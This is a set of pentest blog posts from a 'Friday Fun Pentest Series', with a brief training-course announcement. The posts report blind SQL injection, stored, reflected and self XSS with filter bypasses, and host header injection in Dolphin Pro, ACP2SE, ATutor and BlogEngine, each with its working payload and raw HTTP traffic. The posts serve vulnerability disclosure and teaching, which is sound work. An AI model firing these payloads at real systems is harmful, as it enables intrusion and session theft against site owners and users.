Friday, 21 March 2025

Friday Fun Pentest Series - 21 - SQL Injection in Admin Functionality - dolphin.prov7.4.2

Description

- It was noted that the admin functionality was vulnerable to Blind SQL injection


SQL Injection in Admin Functionality

Steps to Reproduce:

  1. Login as admin user and visit the page of "http://192.168.58.170/dolphinCMS/administration/index.php?cat="
  2. Add the MySQL injection SLEEP payload to the "cat" value
  3. Notice that the backend would delay the HTTP response for 14 miliseconds  

%27%20and%20(select*from(select(sleep(14)))a)--%20


// HTTP GET Request

GET /dolphinCMS/administration/index.php?cat=%27%20and%20(select*from(select(sleep(14)))a)--%20 HTTP/1.1
Host: 192.168.58.170
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0
[...]


// HTTP Response

HTTP/1.1 200 OK
Date: Thu, 20 Mar 2025 22:55:46 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 55510



Friday Fun Pentest Series - 20 - Stored XSS in Messaging Functionality - dolphin.prov7.4.2

Description

- It was identified that the "Send Message" functionality was vulnerable to Stored Cross-Site Scripting, opening the doors for potential account takeovers and more advanced attack scenarios


Stored XSS in Messaging Functionality

Steps to Reproduce:

  1. Login and visit "http://192.168.58.170/dolphinCMS/mail.php?mode=compose"
  2. Add "Recipient" and "Subject" with random words
  3. Add the below mentioned XSS payload that would bypass the XSS filter in the message section
  4. Intercept the HTTP POST request and add the payload once again, as it might get filtered (make sure to URL encode the spaces etc)
  5. It would trigger once the message has been seen
<iframe srcdoc="<img src=x onerror=alert(document.domain)>"></iframe>


// HTTP POST request

POST /dolphinCMS/mail.php?ajax_mode=true&action=compose_mail&recipient_id=1 HTTP/1.1
Host: 192.168.58.170
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0
[...]

subject=test&message=<iframe+srcdoc%3d"<img+src%3dx+onerror%3dalert(document.domain)>"></iframe>


// HTTP Response

HTTP/1.1 200 OK
Date: Fri, 21 Mar 2025 17:41:52 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Content-Length: 455
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

<div class="MsgBox" id="1742578912167">
<table class="MsgBox bx-def-margin-top bx-def-margin-bottom"><tr><td>
<div class="msgbox_content bx-def-font-large bx-def-padding-sec">
Message has been successfully sent. <a href="http://192.168.58.170/dolphinCMS/mail.php?mode=compose">Send</a> another message or <a href="http://192.168.58.170/dolphinCMS/admin">view</a> admin's profile.        </div>
</td></tr></table>
</div>







Wednesday, 19 February 2025

Friday Fun Pentest Series - 19 - Self Stored XSS - acp2sev7.2.2

Description

- It was found that the application had problems around sanitizing and output encoding correctly, leading to Self Stored XSS.


Self Stored XSS #1

Steps to Reproduce:
  1. Visit "http://192.168.58.168/acp2se/mul/muladmin.php" and login with "admin" / "adminpass"
  2. In the field "Put the name of the new Admin" enter the following payload "><svg onload=prompt(document.cookie)>

// HTTP POST request

POST /acp2se/mul/muladmin.php HTTP/1.1
Host: 192.168.58.168
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
[...]

name="><svg onload=prompt(document.cookie)>&submit=Submit


// HTTP Response

HTTP/1.1 200 OK
Date: Wed, 19 Feb 2025 08:22:26 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
X-Powered-By: PHP/5.6.40
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 1210
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

[...]
<table border='1' cellpadding='2' cellspacing='2' width='850'>
<tr bgcolor='#C0C0C0'>
 <th width='850'>You have added a default Admin. His name is: "><svg onload=prompt(document.cookie)> .</br> The default password will be: <b>Admin</b>
[...]

















Sunday, 16 February 2025

New Web Security Training Course !

Its been a while since I have released any papers related to web security. Without any further delay let me introduce you the "Web Security Training" training manual. 

Introduction

Aimed at those that would like to learn more about web security and web app pentesting. The "course" is freely available, with taking the approach of "learn as you practice". 

Each topic has a few bullet points describing what the vulnerability entails, then a screenshot and relevant payload, demonstrating the exploitation of the misconfiguration or the relevant issue.

Download Link

File is in PDF format. Requires the download of a VM (virtual machine) OWASP BWA. The course demonstrates OWASP Top 10 flaws and beyond. It is free of charge. Worth mentioning how good the "Mutillidae" web application is for training purposes.

https://drive[dot]google[dot]com/file/d/14FWeVKHz00hIrZH9x6Z4B5MHPH2K3cAu/view?usp=sharing

Saturday, 18 January 2025

Friday Fun Pentest Series - 18 - Host Header Injection - atutorv2.2.4

Description

- It was found that the application had a Host Header Injection vulnerability.


Host Header Injection #1

Steps to Reproduce:

  1. Visit specific page of the application
  2. Intercept the HTTP GET/POST request
  3. Modify the Host header to a domain of attackers choice
  4. Forward the HTTP request

// HTTP GET request

GET /atutor/bounce.php?course=0 HTTP/1.1
Host: yz13ej73z3j9dnnv3rt0yxqeg5mwauyj.oastify.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://192.168.1.110/atutor/login.php
Connection: keep-alive
Cookie: ATutorID=oukcasgb86k60mefasc36joje4; flash=no
Upgrade-Insecure-Requests: 1
Priority: u=0, i


// HTTP response

HTTP/1.1 302 Found
Date: Thu, 09 Jan 2025 18:55:35 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
X-Powered-By: PHP/5.6.40
Set-Cookie: ATutorID=nl8ahpeo2tsd0mc4d2a0br4a94; path=/atutor/; HttpOnly
Set-Cookie: ATutorID=nl8ahpeo2tsd0mc4d2a0br4a94; path=/atutor/; HttpOnly
Set-Cookie: flash=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0
Set-Cookie: nexthelp_cookie=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Location: http://yz13ej73z3j9dnnv3rt0yxqeg5mwauyj.oastify.com/atutor/login.php
Vary: Accept-Encoding
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8











Friday Fun Pentest Series - 17 - Reflected XSS - atutorv2.2.4

Description

- It was found that the application was vulnerable to Reflected XSS.


Reflected XSS #1 - "theme_dir"

Steps to Reproduce:

  1. Login to the application with admin user
  2. Paste the following URL into the browser

http://192.168.1.110/atutor/mods/_core/themes/index.php?type=Mobile&enable=Enable&theme_dir=<script>alert(1)</script>&mobile_version=2.2.2


// HTTP GET Request

GET /atutor/mods/_core/themes/index.php?type=Mobile&enable=Enable&theme_dir=<script>alert(1)</script>&mobile_version=2.2.2 HTTP/1.1
Host: 192.168.1.110
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: ATutorID=f6oaq82rkkjc2efnmi1qkig537; flash=no
Upgrade-Insecure-Requests: 1
Priority: u=0, i


// HTTP Response

HTTP/1.1 302 Found
Date: Sat, 18 Jan 2025 20:39:58 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
X-Powered-By: PHP/5.6.40
Set-Cookie: ATutorID=o0p8bdoggbsj1h0lf1des5gcm1; path=/atutor/; HttpOnly
Set-Cookie: ATutorID=o0p8bdoggbsj1h0lf1des5gcm1; path=/atutor/; HttpOnly
Set-Cookie: flash=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0
Location: /atutor/mods/_core/themes/index.php
Vary: Accept-Encoding
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8





Saturday, 14 December 2024

Friday Fun Pentest Series - 16 - Stored XSS with Filter Bypass - blogenginev3.3.8


Description

- It was found that the application was vulnerable to Stored XSS via specific payload that bypassed the filtering in place.


Stored XSS Filter Bypass #1 - "Add Category"

Steps to Reproduce:
  1. Login as admin and go to "Content" > "Posts"
  2. On the right side of the page choose "Categories"
  3. In "Title" and "Description" paste the following payload <b>12345</b><script>alert(1)</script><b>12345=</b>

// HTTP PUT request

PUT /blogengine/api/posts/update/foo HTTP/1.1
Host: 192.168.58.153:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
[...]

[...]
","DateCreated":"2024-12-14 14:33","Slug":"xss","RelativeLink":"/blogengine/post/2024/12/14/xss","Categories":[{"IsChecked":false,"Id":"40a7136b-2f0d-491a-8690-2a092681ed3b","Title":"<b>12345</b><script>alert(1)</script><b>12345=</b>"}],"Tags":[],"Comments":null,"HasCommentsEnabled":true,"IsPublished":false,"IsDeleted":false,"CanUserDelete":true,"CanUserEdit":true}
[...]


// HTTP response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Sat, 14 Dec 2024 15:34:08 GMT
Content-Length: 0


// HTTP GET request

GET /blogengine/post/2024/12/14/xss HTTP/1.1
Host: 192.168.58.153:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
[...]


// HTTP response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
x-pingback: http://192.168.58.153:8080/blogengine/pingback.axd
Content-Style-Type: text/css
Content-Script-Type: text/javascript
X-Powered-By: ASP.NET
Date: Sat, 14 Dec 2024 15:44:05 GMT
Content-Length: 19229

[...]
<span class="post-category"><a href="/blogengine/category/&lt;b&gt;12345&lt;b&gt;&lt;script&gt;alert(1)&lt;script&gt;&lt;b&gt;12345=&lt;b&gt;"><b>12345</b><script>alert(1)</script><b>12345=</b></a></span></div></header>
[...]






Friday Fun Pentest Series - 21 - SQL Injection in Admin Functionality - dolphin.prov7.4.2

Description - It was noted that the admin functionality was vulnerable to Blind SQL injection SQL Injection in Admin Functionality Steps to ...